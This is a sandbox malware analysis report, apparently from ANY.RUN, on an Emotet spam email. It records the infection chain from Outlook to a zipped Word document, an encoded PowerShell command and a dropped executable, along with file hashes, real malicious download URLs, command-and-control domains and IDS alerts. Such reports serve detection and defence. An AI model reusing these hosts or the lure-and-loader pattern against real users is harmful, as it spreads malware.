Field | Value |
---|---|
File name | SPAM .msg |
Full analysis | https://app.any.run/tasks/cf79713d-0a96-4812-9371-362a21f9bf95 |
Verdict | Malicious activity |
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns. |
Analysis date | October 20, 2020, 02:09:10 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | — |
Indicators | — |
MIME | application/vnd.ms-outlook |
File info | CDFV2 Microsoft Outlook Message |
MD5 | BF0D6BBD7CE6F76FC80ADA39DB2A3494 |
SHA1 | 0A5B637FD9B9DEE54594ED5D5CB2D5A06956A4A1 |
SHA256 | B161FE4F8DB06FD9C3D49EADD5958680CC2CAAC2E0BAFF083ABB2C32D24A252E |
SSDEEP | 1536:xF9j1U3+q7CU2RCvq6W1wsQrvAY/J03CgZS+9AByUwohnSIGwJ6qwdxR:Pe7CZRCvW1xyIYh0SwAByToVSL1d |
Extension | Identified format |
---|---|
.msg | Outlook Message (58.9) |
.oft | Outlook Form Template (34.4) |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2472 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\SPAM .msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Outlook; Version: 14.0.6025.1000 |
3772 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\SGQSNULX\Electronic form.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | OUTLOOK.EXE | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 |
3448 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3772.11050\Electronic form.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
3392 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 |
860 | POwersheLL -ENCOD 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 | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3172 | C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe | C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe | — | wmiprvse.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
3096 | "C:\Users\admin\AppData\Local\wmploc\tsdiscon.exe" | C:\Users\admin\AppData\Local\wmploc\tsdiscon.exe | — | D2en0d.exe | User: admin; Integrity Level: MEDIUM |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR4105.tmp.cvr | — | — | — |
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\SGQSNULX\Electronic form (2).zip\:Zone.Identifier:$DATA | — | — | — |
3448 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4508.tmp.cvr | — | — | — |
3448 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_034F30A8-8AEC-4237-8140-2802BBE96F06.0\14F9C305.doc\:Zone.Identifier:$DATA | — | — | — |
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\outlook logging\firstrun.log | text | C0A6A734CD50CB4AC52DE64D86912C07 | 148E72A3CF19942547B68C14EF1AF62023A159C135AAA3DDD3EB0DD2609B1A08 |
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | E29F98FB2585C381FC9F6BA016841AF8 | 8E889158497CA2EC80A0EF159102790AB692EE06ED96151CB1B46E4F529C2D51 |
3448 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_034F30A8-8AEC-4237-8140-2802BBE96F06.0\14F9C305.doc | document | 6FBCFA378463859E57D49FA5CDE459E6 | 5EFA8EA16D3A6F6CF7809B90FCA93BE1C0D98F516BC7D715C282C726B545E952 |
3772 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb3772.11050\Electronic form.doc | document | 6FBCFA378463859E57D49FA5CDE459E6 | 5EFA8EA16D3A6F6CF7809B90FCA93BE1C0D98F516BC7D715C282C726B545E952 |
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_ContactPrefs_2_BD3811C31EB3E5478AD17D06CE92DE4D.dat | xml | BBCF400BD7AE536EB03054021D6A6398 | 383020065C1F31F4FB09F448599A6D5E532C390AF4E5B8AF0771FE17A23222AD |
2472 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\SGQSNULX\Electronic form.zip | compressed | BC26B98DAD034334D4F2F642F8A7F5BC | 1184BA6D6D9CF011CFF380F25C84F426F014D0E9B5196000B55C9A792EBC9EC2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2472 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
860 | POwersheLL.exe | GET | 200 | 202.66.172.245:80 | http://legalempowermentindia.com/cgi-bin/9Z6L/ | IN | executable | 596 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
860 | POwersheLL.exe | 104.31.76.228:443 | greenlandlion.com | Cloudflare Inc | US | shared |
2472 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
860 | POwersheLL.exe | 163.43.94.66:443 | hd.yamarinkou.jp | SAKURA Internet Inc. | JP | unknown |
860 | POwersheLL.exe | 94.130.88.157:443 | arifulhuq.com | Hetzner Online GmbH | DE | unknown |
860 | POwersheLL.exe | 148.72.118.97:443 | webclientworks.xyz | — | US | unknown |
860 | POwersheLL.exe | 198.37.123.126:443 | theusmansaif.com | DC74 LLC | US | malicious |
860 | POwersheLL.exe | 202.66.172.245:80 | legalempowermentindia.com | ZNet Cloud Services | IN | suspicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com | — | whitelisted |
arifulhuq.com | — | suspicious |
theusmansaif.com | — | malicious |
greenlandlion.com | — | unknown |
webclientworks.xyz | — | unknown |
hd.yamarinkou.jp | — | unknown |
legalempowermentindia.com | — | suspicious |
PID | Process | Class | Message |
---|---|---|---|
860 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
860 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
860 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
860 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
860 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
860 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
860 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |